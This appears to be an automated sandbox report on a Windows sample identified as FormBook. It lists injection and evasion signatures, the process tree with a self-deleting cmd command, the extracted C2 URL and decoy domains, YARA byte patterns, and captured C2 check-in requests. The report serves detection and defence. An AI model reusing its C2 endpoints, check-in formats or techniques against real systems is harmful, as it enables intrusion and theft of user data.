Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report NQBNpLezqZKv1P4.exe

Overview

General Information

Sample Name:NQBNpLezqZKv1P4.exe
Analysis ID:452473
MD5:f03bf8d3ecc2ae4b40f836c59ac09bdf
SHA1:58f48a5a960eac4ee1f33ea16075cfd44f37b3a3
SHA256:2e4cf88a434d484057fcc090cb7de5deb6d30c8e00da339c886f2482f6a7ebe1
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • NQBNpLezqZKv1P4.exe (PID: 6940 cmdline: 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe' MD5: F03BF8D3ECC2AE4B40F836C59AC09BDF)
    • NQBNpLezqZKv1P4.exe (PID: 3984 cmdline: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe MD5: F03BF8D3ECC2AE4B40F836C59AC09BDF)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 7056 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 7012 cmdline: /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extraclass.xyz/4nn8/"], "decoy": ["chamtowon.com", "yaaquu.com", "thepettybox.com", "zrcezzfdfkyjlir.com", "finalcutgrowshop.com", "856381151.xyz", "fbgroupsmadesimple.com", "thinktank-texas.com", "shoppingsys.com", "natezubal.com", "skyhighbud.com", "toddlely.net", "bachelor-boys.com", "blogdepr.com", "chuanyigou.com", "photocouture-show.com", "spacetasks.com", "kureitall.com", "qmcp00033.com", "visiodaya.com", "teleasistencianamaste.com", "updates-app.com", "marbleheadelementary.com", "jameswilliamgordon.com", "bouncingbellybeans.com", "icloud-site-fd.com", "hotradioarnhem.com", "shengdagp.com", "sickrime.com", "17545bullock.com", "cmovied.com", "wwwpaturnoiketollbyplate.com", "qphis.com", "vhsstores.com", "sorcierebienaimee.com", "y7mioung.xyz", "indianapartylines.com", "fezze.info", "uweup.com", "xn--gestinvalenciana-9ub.com", "creativeartaadda.com", "cattedralidismeraldo.com", "thecarestudio.com", "etruruueurt.xyz", "sidehustle.kiwi", "hagumee.com", "sdkqglgs.com", "nirvananaturalcbd.net", "grassth.com", "zeugmagiftandmore.com", "smartscene.club", "chsecv.com", "gettothecoast.com", "whiskey-friends.com", "ambernai.com", "iregentos.info", "sh-zzjy.com", "boicity.com", "sgtcsleathers.net", "themixedveggies.com", "greenbanc.net", "papiempanadas.com", "ndirxk.club", "iafzal.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        4.2.NQBNpLezqZKv1P4.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.NQBNpLezqZKv1P4.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extraclass.xyz/4nn8/"], "decoy": ["chamtowon.com", "yaaquu.com", "thepettybox.com", "zrcezzfdfkyjlir.com", "finalcutgrowshop.com", "856381151.xyz", "fbgroupsmadesimple.com", "thinktank-texas.com", "shoppingsys.com", "natezubal.com", "skyhighbud.com", "toddlely.net", "bachelor-boys.com", "blogdepr.com", "chuanyigou.com", "photocouture-show.com", "spacetasks.com", "kureitall.com", "qmcp00033.com", "visiodaya.com", "teleasistencianamaste.com", "updates-app.com", "marbleheadelementary.com", "jameswilliamgordon.com", "bouncingbellybeans.com", "icloud-site-fd.com", "hotradioarnhem.com", "shengdagp.com", "sickrime.com", "17545bullock.com", "cmovied.com", "wwwpaturnoiketollbyplate.com", "qphis.com", "vhsstores.com", "sorcierebienaimee.com", "y7mioung.xyz", "indianapartylines.com", "fezze.info", "uweup.com", "xn--gestinvalenciana-9ub.com", "creativeartaadda.com", "cattedralidismeraldo.com", "thecarestudio.com", "etruruueurt.xyz", "sidehustle.kiwi", "hagumee.com", "sdkqglgs.com", "nirvananaturalcbd.net", "grassth.com", "zeugmagiftandmore.com", "smartscene.club", "chsecv.com", "gettothecoast.com", "whiskey-friends.com", "ambernai.com", "iregentos.info", "sh-zzjy.com", "boicity.com", "sgtcsleathers.net", "themixedveggies.com", "greenbanc.net", "papiempanadas.com", "ndirxk.club", "iafzal.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: NQBNpLezqZKv1P4.exeJoe Sandbox ML: detected
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: NQBNpLezqZKv1P4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: NQBNpLezqZKv1P4.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extraclass.xyz/4nn8/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.boicity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.sh-zzjy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.zrcezzfdfkyjlir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.iafzal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.nirvananaturalcbd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.updates-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.fbgroupsmadesimple.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.boicity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.sh-zzjy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.zrcezzfdfkyjlir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.iafzal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.nirvananaturalcbd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.updates-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.fbgroupsmadesimple.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.boicity.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 11:15:39 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.zrcezzfdfkyjlir.comVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Thu, 05-Aug-2021 11:15:39 GMT; Max-Age=1209600; path=/Cache-Control: privateX-Host: pages3.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3802Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 32 36 34 35 31 37 34 35 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65
          Source: NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpString found in binary or memory: http://050005.voodoo.com/js/partner.js
          Source: NQBNpLezqZKv1P4.exeString found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com(
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.comp
          Source: NQBNpLezqZKv1P4.exeString found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
          Source: explorer.exe, 00000005.00000000.702532502.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comR
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641810889.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comen
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comroa
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.645535031.000000000555E000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640649210.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/ct
